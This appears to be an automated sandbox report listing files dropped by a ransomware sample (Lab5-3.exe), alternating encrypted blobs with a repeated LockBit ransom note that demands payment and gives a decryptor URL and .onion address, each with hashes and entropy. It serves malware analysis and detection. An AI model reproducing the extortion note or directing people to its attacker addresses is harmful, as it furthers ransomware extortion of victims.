                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6384
                                                                                                          Entropy (8bit):7.975001380483164
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:eVMQO4joCAhYx/QrIDoZqbTbmc+I+qkyoJyqWqfQIHwfeWWxCU4fcnoWLFG0V1yL:7Q5fKGbmcilJLWqfNSWxCEo0+B0Cb
                                                                                                          MD5:FEB5ED1F09D32330C282FA501CFA4F2C
                                                                                                          SHA1:D3F2F187E024D5BDA79E917ADE0C4A123D75E0F7
                                                                                                          SHA-256:ADCBA05E3B6FF35261B16572EEE5CD98874C07C91DF1E3AD43FF35A8E8203EE7
                                                                                                          SHA-512:2A5DD44BD08831CB3A7C45692F1DDD0240705ABB98CF7A247BB7BAD1F953972396D9E6B7D7DAAEC1A6A9325C62DD6A10B05CF8CEF66433BC957B01AA3D6143A1
                                                                                                          Malicious:false
                                                                                                          Preview:.[.9F..G0.F..#|.....)!.........c.?*&..Q..........1....-.+w.g...1..6..<.6+...}!.gr.^}.v..e..e........!....t.....+G4...0R..?...M.+.-IVx..2...&.+i..=....[..#F/..7L......m&..^F.K..Y....5.?..S..C...O......~..0>n.c..7$..h..*O...f.........A~.: .j.$...T.....=K...h1......E.V....R6.cO...o....A.-6B..-AbxE.cf.[Bnt.....G, O......B..8...?......1w".%y..a...v!j2RY...RG..s;6y...\z.....k.A..z....XU....7T5FBW....z.X-........n.Vn.@..ei..O.....a...ny...tx.9+..k....I...f[}(..(%(..r.g-N.'-(F...~.ej.}.....U.\P.....M.....'.......%.4.P.../.w..J.@.}....9>.x.V..m<...w.U.+r.R.<$...d..f....M..rkr_`q7..R.c{U.M.BQ...Pp...\...Q.9;..D:.S.V...|4.P.....c.a.mI..8...(...."..;-V.i`.R.!+...8".....n...fq...rw.J.'."....K.....c|.........=..%..$.V....xP.[...yR...:...G..DL..]+......[K.y..[...kW.h...U&[.{K'.O....|.....=<.dP........D.*w.p..k" ..Ov....g.k....~...[Z..W.[y.9..*..z.......8F.....V.)..B.hV..!.......\p...G...4N..Q2.'T..j\./.K.t.d.._..*...g.LN.r1....5x...=r..y..]...........h...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6384
                                                                                                          Entropy (8bit):7.973824773988212
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:ruAA66+GCly3cGajpjjr70k3mYI49aQOdPLbA0Cb:rtBGCnG6NX3xoQOdTEtb
                                                                                                          MD5:7B96860A2E48AE6640DB546089265A91
                                                                                                          SHA1:4D427511CEC9EE3C7C568D241F29C40B47987599
                                                                                                          SHA-256:19C0184D31CC5DF6F559D1CE56B92F540EE8C5501DA95085D36F45849545680F
                                                                                                          SHA-512:CC869437956732269302BF9C03A51416126BEB4CF50E594D043B1FC8DCE8E19F20CF0DCA1E531E1C0D7101839A184DD0AE261D1DC4954F107B498B7285653FC6
                                                                                                          Malicious:false
                                                                                                          Preview:(... .e.7.'......H~.%.J._.0PO.y=D.Dv.|$m.@*4/.-..'.*..y.@. ....lh.....s...3~..~t.........M..........;+......\..d....._y..E.\:....e8nZ..t.s6...p/Y.f..1........@..\..5^..G.xuPi)...r... .Y..,.eF/..M........(U{#$e..fSa.N.+..U..oa_..,.N....y.,{5....F.<..0.-.U..A....I)..F.+..|].h...4...~/...E%.y..z..<..>..,.>%..-y...0.m.g_.!....<...).]..f9.t....{.].......":.'.S2r.Y..b..'q.u.....g...Q.4..#.G@*7.xj.........L..A......&[=.......l..].39.7._..Sk....><...*;.....hNx..6!s.F,.)..x.`.........s....Xp..S.]R..0-....0...jP._..n.B..Q.$...]6....)S}7L.#.uY.N..+.f#......j...(UY.)D.M...6q...0...@.(,x/-.7...C.....8...'b...w....t6v..u..H...e.:...k..-.c3..}rl.~a.j.....M......#l.....y.ri..z.`...:.....[....r...ms...1...\.{+.'aI*......S~2.[KF..)..[:YP.Q...B@..6...M.M mC8O.Ti..%..S..Fs.NSvI.`.&:.....,..........TH....n...V2!..7....XQ]. ....1..=........n..{........:H.|p..L.X].f.D..!4....3..iw#_.|w...~(o.Y)...t.._w..]..PK..@0.|3.....8w..V.{..=$..P...I#...(...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2448
                                                                                                          Entropy (8bit):7.914301664274899
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:1crn1hERG3/nZh9/bNMIjQ9KL2wI40HfUTid3hBaUoSGFcmeykEdEElU92i:21cMDrM59UGx0uKeY2ElUJ
                                                                                                          MD5:7CCD55A18B030706B29AB8D02C2391F1
                                                                                                          SHA1:D447F788C6CB2E3084D79BA20BD7F36D9BCE4D4E
                                                                                                          SHA-256:734141F8A83D021C716D4D72A2CB2879DBCA801FDC2C4190960EAB444C2EDFC9
                                                                                                          SHA-512:E129568C2A2E21BBA5A8CA35A803F952C6FB22690876D97C35B7DFD7686C6923C8FD24FFC2A46EB8757126613807583A93A435C87E8E0C48108C082E859B3695
                                                                                                          Malicious:false
                                                                                                          Preview:.*..[.J.........].]5..b.`,.'.hm..z.....|W..,...U!.U..R..e..'.....V.4......X.T..r.>.6.."....g....%.u..*0].5~4.A0..uX.).Z.`...4BP#.....%1...v.rs.C....n}..CrQ9.......7...D...Z,.ju K..:\So o/>..D..."B....e.........z...GWY.,..%..D=,%...?.l./y..o0G.C.B.!B0...,........L.".7..].a.......F..i....(...i.t-....]1P.N.._W...........~eD..\...m.H.{ G.,.b.]?#.9\-..l.Ei...y....y~..1..b.R...S.z...=.,.8qh.N....8to. M....Lw#....2..H..e..mn'\..[...K.V}.K......7..w.9. ......P..0-..]..E..q.B..(.......,.;._.).Q..S.7N.w..."...H........V.7.`..}.EecV.../.uW..U...F.b[{....o..3?.~..d.+..e.5..-..%c7.2.......|..A.w......T4.....`a.......o....I...`..9f}.n....@...!s..".R.Sn......W..M0.u..o..e`.>f... ..qD....S...+.....F.(...;1.QD.!../#.e......o..P.....;:>}=h#.....m..y.....E...8.^.....w.~......e(.?.fa...B..z.......p..'y._..-..*.p.....=..@...OC,c6A...... B.c..fG%...-.....s.Y\v.a:V..Ud.....m.n...V..9.q..|.KM.....wv..Z[.0.F%|..r..W.J...w......(.Q..B ..L...:...T..%....`0.....(.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6160
                                                                                                          Entropy (8bit):7.969950952702604
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:MoH7bXGPMvctoqN3V/gB/xf/zcKKBT6yPj7O0mr4jXNTWDCzBH+d1+GuGx0uKeYO:MoHXR4FC/x+tE4JvzBH+dk20Cb
                                                                                                          MD5:FE43E3EBF56B0861863A7E9B20E518B6
                                                                                                          SHA1:7FF0EFA41F9378C90E1FC2931021C5C37001BB95
                                                                                                          SHA-256:155286D4301CC83F63EEBEE05CA1D4330682C5D9B9BB79916729D181E936BDE4
                                                                                                          SHA-512:7BCFF23341978D952E413AA65E9CEF673284EC6C7B8BFB23696034ABCDF69032C8B45DDA0501FF83F2251ABD47D6DBA850F13F706A4DDB93A7A6B3109D4F135D
                                                                                                          Malicious:false
                                                                                                          Preview:3,)...V)"...+.r..73....L._..I.&.e.v.g-...f!.-8..P)I....4x...A(.kN...m.O.xN/.. ..M0Gf;....L..."......H.......=.....\....dN.A...N3$c~...<.*Zh]...^.x..{Mef.E..E..t...Dz.z.[.).oZA...p.g.C...k.[@..6.x......?q......[..~.q`...#.TV.{....1....q.YY.Y.a...O.....r.t../.:...`;.\.....8.&.V?..e..?..<:...hj(....<F(..np..T...rSe.....w.0N.Wj#...R....VZ.....mJQ!..T...B.g.....:.l.\f.b.J.T.*.\...=.m..0;....a..V..9..7Drlpb.......@....6.H......./j{a.G...../..$"...U3..)..X..8g.|.(C..S..0[...O...BX.....<...ZT.....^...nEsG..JX..$U!I...cf..1..w....F...M..dpF..p.D....U...EyM.K.E........".......UYP9..9.5.j.K.g...bf%wv....mF.4...F..8..o.O+.C.%".]...c.am.._.h.f=.......=.k.~ZO.U.]cO..tf`.*..v.+?..L7.........x}$...oeJ...aK..u!.=....dN.Qc..z@7tO.}.#....s.V.@.^V...........h{.oa..M..i..[BKIw.mC.[..g....F{3.c...6".....J....H......._..,.B.2..:../}.L`.B\.......].2...Z^...G!'Rw...=D.4.."I.Bp'~.F............*......~J.yh...-.c.Teh...yw.....c.<*Z...%f...,y......#..m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6576
                                                                                                          Entropy (8bit):7.975691274757877
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:jcGe8y7CSyerh16DYH/W08MgRJp8C0UdYrBiAW0Cb:jcGJy7CSye91ve08MisUdkBiPtb
                                                                                                          MD5:7F457CEBFE41D58F94047DE6BA4CA6F3
                                                                                                          SHA1:683685B9195062745B474E24412835137AAA4F05
                                                                                                          SHA-256:2BCEFED10731E117A5A3BBDC1996B84DB932624EEF1A73248E119F8FEE14D999
                                                                                                          SHA-512:888785D9631ACDDC13715937331E413B1E55A61ABED3BE3911EA8FF56B33BD351E32AF005C7402FD117FE2CD7ACD61C6BA006BAF15D746E1C762DD1D89A3C110
                                                                                                          Malicious:false
                                                                                                          Preview:d.I.;...?..ZupB.!@k.e.z.....0.......Sc+...,=8.0..G....}`cH5...&I...Z`X._.|....D..dQ1=.+.@X.?...._..R.E..P...-S..V.FSc.T........%`.\..=g..p&.m....z.b..S...R.c...i....Q'......J.".[......`K...L?+...8.M..>......w.u.j1..D..F....A.i..T0......:.ny...o.....!......*v(.~.0....2W.](.l..=r:..3..T+y.... .P..z.j..n..'.@y.$K../.."\?.z.......M3.....R.~e....<1Jp.}j.%6....@..!D.B+.....f).xO....=a..8Cc...-..-....q.....#.?.@.....j:.B.T.v>.3]v.!.[... ....P.t..:;J.A7...5Q/.y....'..K.KULP.. .............3.t....?.*3....LWB.0...v.w.Q......G...".....8-?..RP....b\..-.P!{0e.n.)...Y..\..K...hq.....-...+.B....z..r...0..{0Y{.9...v..o...w...([.'..._..tZ..6...M. .....5J86!.jDx.....G_^.c..y;^./G.A..;.K&e..P.....M....,.. ..N...........KN.....jl<~a eP..3..L..-.,U...}5*K..'a.W(....<...2H.....XW.}...I.C..*..]*HV...P.0.u...."L.%.jh....v.H.6o..2.M.(qI7?E|.;...u......>.|....J.......O"....I........YP.._....["M.v..x..,....U.Q.r.*.hkv..C<D...F.....xL..OrF.G<0$5..........
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6112
                                                                                                          Entropy (8bit):7.972800034946803
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:jDWDRTibFstJG4Uhy2O85rLR443gjYilE8djhHz1FyWywLz5AJwDnCA8aGx0uKeR:OagU59y43+YildlJN6JOC/J0Cb
                                                                                                          MD5:98AE025291DB9CFB115820044FFC7644
                                                                                                          SHA1:C96BEA0832D2FDA076CE421D10975B2055B3AFBB
                                                                                                          SHA-256:49270CAFCDCFE5FD5F47300AF87E98FC556DC834F8C0D7BE97EBF436F87F93F7
                                                                                                          SHA-512:818FBC1853675391FFAAF383908291155BE46BB17E4613BB9FE5BD61AC600EE187E43B07F1FADB4D6E50F644AFB9E528E2D0B0AB717608E8CF44E62122138545
                                                                                                          Malicious:false
                                                                                                          Preview:...$.0..A..z...?:#7E9..O..gK.....).,XgU...u.....H..Npx.U.....jI.....q...(D.......}L.....W.|....|(....Qr..!.._..<..s....J....C..1h(.-.9...QR.zf..L_.`K.F..VgM.qS...!6rK.|^.e....2]...h.#......4.EC............D#.>Y.....A.-m0S|/.B.`..OWL..q"...<-0.}.p.@....d.Q.V.A.b....sy.;.a......gsG.*i...F.@g.m.r.Z(.*.h.cS.#..?O....\.Jg!...L....C......?^.R..+...XKq....i...q6.....U.....*.[...@..z.S....}..i..T.. .5.|.2....D.C......Tr)..hc....m7.1.8..T...J.aNX+_..~.e.].>.rQ.7.^.;....G..'.'..h&._^....q...A.w...{P..MB...W...C.\_.<.qk=..L....PY.G'x.z.yg..."..w^y...\..W....b.t.I.wTd.+...Z}3...G!.rzo...........W...y.3..^.s....9.jl.A..U..yF..{.......T.........l1..q.?....?|.N....d..hO..8S.x..!M.J.U{.I2.:G..............~t\..>.q......4..T#C....\.cd...n......z..w.J..{{.o"....^d...`u...uE..vG.vLI`..\.q./2.%U.a3t\.H./9...{....b`.=..........H-#}d..|%,....X......0.,....V..{X,.5$.Y..@.&8e......C.i......~Y..z..R.T.o.v@`i.i5......X.....;.....J.c..Ygj.a.&........c{...=....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6704
                                                                                                          Entropy (8bit):7.9705446423545006
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:2nDNHTb9TuUjijY3HltXA4ramGnrUlRlqlnmbksYmUokd/WA0PzmZg8EUwjvGx0a:2DNzhuUjiU1TraoRymVUoYeAu/l40Cb
                                                                                                          MD5:EE2781CDD16EFF5B1262DCF32AE5D7F3
                                                                                                          SHA1:BEB97E4CC1D4407342E6D2692B729231157BE599
                                                                                                          SHA-256:849087991F2E33DD49664A95F2F80EEECAE21C9C082036A23D9AF51C95C2CC23
                                                                                                          SHA-512:EBEA8EDDBBDE8DB67EB8091EB52C2D9FED371909936767F57A8B513A12EAB69B9499011E512F91C193ADF58D74A350260FE8133EA034AE6A94A31193B62A2950
                                                                                                          Malicious:false
                                                                                                          Preview:...#.!e.....'M[.U...&....X...%...s...Mt.].meQQ...I....`)3..Q....W.9./~.G...`..........#....{..R....dt....X.>nr|}..L$O./......>Z..6=j?W#.......EQO..:-..q8v~.f..?.;..i...5!^8$......"d........w..rB.qQ......R...}.=j.[.(...<x....6*sO..+T...4K...9d.p@.jp........Q.{...e.....U.aM.L..x.o.o......B.^B....8.......M-G.....i40..r...l..vZh.7}[`.+..'.S...6....x..T......_..\...B}......>(......6...E..}.6........Cv...}.~..H..H..F...\..S*.........Q\.8..1....../,.a.*o0...8./....4....../.{..N ..u>]..K.>.e\.H..bz.+.Y..c..eU..:.b.q.n_.. ...)f../]....>.NA...i........)Ts...x.-W......\......S ..........-p.\..g..X.G......CK.cD.B......!V...!.l...*V.....'....q$ .O..9..E.X....3)...G..7.K.P.f.D.D..dy.#.[.......Bfg.rz>...a.....|......O-b.Pma!...w.k.;.2B.g..V.m%.1..z*.I..s..!..#.V.@A....T./#.K....F!.6.E..n.[.c.bq9....d.LD...2.... .A.!F2. ...P....4.*.THN.#2.@.Q.q....M......\............W......g^r.[j.......d...1.-,.Q... wo.. .z?..S..'"Gz1.6.s.....w..}..V~B.s/......@pxdu.@.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6464
                                                                                                          Entropy (8bit):7.972454295291516
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:OLL14iBsZZT/SPBkHg2yVLhjeplh0tpime9JKwIQyCGx0uKeY2ElUJ:OZBsZZT/SaMhhMn0p2i0Cb
                                                                                                          MD5:27F5B4ADC3D250FB51C89387ABA6B32F
                                                                                                          SHA1:7BA90EE1BC8D414D3007DDE67D9BEDF5380E8087
                                                                                                          SHA-256:0869BBFE3D6764366912F27E39303D29FBA4E64210A58E6E3152F5FAEAC6F024
                                                                                                          SHA-512:3F6BB0955039A2238131522A35A42389F59FC821F9E0AF333239A165657CA8ADFDC7E884DD264316CD6D34913A9DDD58654C99A8AA7C470C42A06AE0F9DD8B82
                                                                                                          Malicious:false
